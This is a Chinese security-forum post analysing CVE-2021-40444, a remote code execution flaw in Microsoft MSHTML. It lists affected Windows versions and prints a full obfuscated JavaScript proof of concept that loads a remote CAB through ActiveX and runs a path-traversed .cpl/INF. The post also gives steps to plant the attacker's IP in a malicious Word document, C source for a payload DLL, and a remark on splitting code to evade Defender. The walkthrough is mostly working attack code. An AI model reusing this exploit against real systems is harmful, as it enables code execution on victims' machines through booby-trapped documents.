[原创]CVE-2021-40444

发表于: 2021-9-21 20:00 12071

[原创]CVE-2021-40444

watswyqtwq 活跃值

2021-9-21 20:00

12071

漏洞类型:

Microsoft MSHTML 远程代码执行漏洞

受影响版本:

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems

POC:

<!DOCTYPE html><font></font>
<html><font></font>
<head><font></font>
<meta http-equiv="Expires" content="-1"><font></font>
<meta http-equiv="X-UA-Compatible" content="IE=11"><font></font>
</head><font></font>
<body><font></font>
<script><font></font>
function(){<font></font>
try{<font></font>
window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}catch(_0x1c747c){<font></font>
window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}<font></font>
iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();<font></font>
try{<font></font>
window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}catch(_0x5afb73){<font></font>
window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}<font></font>
<font></font>
iframeActxHtml1['open']()['close']();<font></font>
var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');<font></font>
iframeActxHtml2['open']()['close']();<font></font>
iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');<font></font>
iframeActxHtml3['open']()['close']();<font></font>
var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');<font></font>
iframeActxHtml4['open']()['close']();<font></font>
var actx_html_0=new ActiveXObject('htmlfile'),<font></font>
actx_html_1=new ActiveXObject('htmlfile'),<font></font>
actx_html_2=new ActiveXObject('htmlfile'),<font></font>
actx_html_3=new ActiveXObject('htmlfile'),<font></font>
actx_html_4=new ActiveXObject('htmlfile'),<font></font>
actx_html_5=new ActiveXObject('htmlfile'),<font></font>
xmlhttpreq1=new window['XMLHttpRequest'](),<font></font>
window['setTimeout']=window['setTimeout'];//此处可拆分过defender<font></font>
window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','cb8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8Y4c8J5L8$3A6S2L8W2)9J5k6h3y4S2j5W2)9J5y4H3`.`.,![]),<font></font>
window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),<font></font>
iframeActxHtml4['Script']['document']['write']('&lt;body>');<font></font>
var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');<font></font>
cabloadunpack['setAttribute']('codebase','a43K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8Y4c8J5L8$3A6S2L8W2)9J5k6h3y4S2j5W2)9J5x3%4k6W2M7Y4y4A6L8$3&6Q4x3@1b7#2i4K6u0o6x3q4)9J5b7K6m8Q4x3V1x3H3i4K6t1%4);<font></font>
cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),<font></font>
window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),<font></font>
<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',<font></font>
actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',<font></font>
actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',<font></font>
actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../whoiam.inf';<font></font>
}();<font></font>
</script><font></font>
</body><font></font>
</html>

解析样本:word_rels\document.xml.rels

图片描述
       可以看到样本附加连接服务器后，执行poc的javascript操作。
       由于相关的ip地址被毙了，已经无法在打开时，直接启动服务器去下载所谓的cab包了。我们直接替换上面的链接。来加载我们的cab包。

       正常的inf不具有如此大小，改为txt格式查看。
图片描述
       懂得都懂。熟悉的pe结构，直观的感到是个dll文件。

       由于后续操作与我们报的rce操作无关，想触发相应的文件操作，直接改dll文件访问的接口与网址。让其触发是否还有其它的可疑的行为。解析样本告一段落。

复现:

复现分两种，一种直接加载原文件:
图片描述
Note:
IP address: kali ip(in other words,attack ip)

将替换好的ip地址的恶意的docx放入被攻击的环境中，双击运行即可。
kali环境中会出现

另一种相应的文件全部自己编写:

图片描述
Note:
Why occourred this problem?

请尝试使用chmod 777 <allfile>。
或者在windows下作为压缩包解压缩，再解回去，都是可行的。

#include <windows.h>
 
void exec(void) {
    system("C:\\Windows\\System32\\calc.exe");
    return;
}
 
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason, 
    LPVOID lpReserved )
{
    switch( fdwReason ) 
    { 
        case DLL_PROCESS_ATTACH:
           exec(); 
           break;
 
        case DLL_THREAD_ATTACH:
            break;
 
        case DLL_THREAD_DETACH:
            break;
 
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

Note:

Debian
apt-get install gcc-mingw-w64-i686
Ubuntu
apt-get install gcc-mingw-w64-i686
Kali Linux
apt-get install gcc-mingw-w64-i686
Raspbian
apt-get install gcc-mingw-w64-i686

Debian
apt-get install gcc-mingw-w64-x86-64
Ubuntu
apt-get install gcc-mingw-w64-x86-64
Kali Linux
apt-get install gcc-mingw-w64-x86-64
Fedora
dnf install mingw64-gcc
Raspbian
apt-get install gcc-mingw-w64-x86-64

生成cab文件。
图片描述

成因:

图片描述

依稀可以看到mshtml.dll为我们发光发热。

检索url，跳入releaseInterface函数对象释放后，eip发生了改变，允许利用者远程执行其它代码。

参考文献

04cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6D9L8$3y4C8k6h3c8T1P5i4c8W2i4K6u0r3b7#2k6q4i4K6u0V1x3U0l9J5x3g2)9J5k6o6b7H3y4o6b7@1
参照网络安全法第七十六条，该文章仅用于学习和交流。由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害，均由使用本人负责，文章作者不为此承担任何责任。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2021-9-21 20:30 被watswyqtwq编辑，原因：

#漏洞分析 #漏洞利用 #Windows

收藏・1

免费・1

支持

最新回复 (2)
有毒雪币： 16067 活跃值： (17017) 能力值： (RANK：730 ) 在线值：发帖 56 回帖 529 粉丝 350 关注私信	有毒 10 2 楼建议在成因分析部分详细一些 2021-9-24 16:41 1
watswyqtwq 雪币： 958 活跃值： (2128) 能力值： ( LV4，RANK：40 ) 在线值：发帖 5 回帖 74 粉丝 3 关注私信	watswyqtwq 3 楼大佬，还有什么需要改了 2021-9-26 19:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

watswyqtwq

发帖

回帖

RANK

关注

私信

他的文章

[原创]CVE-2021-40444 12072
[分享][下载]WIN11 ISO 来了 9683
[翻译]bh-dc-07-Sabanal_Yason-WP 25847
[原创]Windows按键精灵分析 24950
[翻译]A Crash Course on the Depths of Win32™ Structured Exception Handling 译文 24635

关于我们

联系我们

企业服务

看雪公众号

最新回复 (2)
有毒雪币： 16067 活跃值： (17017) 能力值： (RANK：730 ) 在线值：发帖 56 回帖 529 粉丝 350 关注私信	有毒 10 2 楼建议在成因分析部分详细一些 2021-9-24 16:41 1
watswyqtwq 雪币： 958 活跃值： (2128) 能力值： ( LV4，RANK：40 ) 在线值：发帖 5 回帖 74 粉丝 3 关注私信	watswyqtwq 3 楼大佬，还有什么需要改了 2021-9-26 19:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复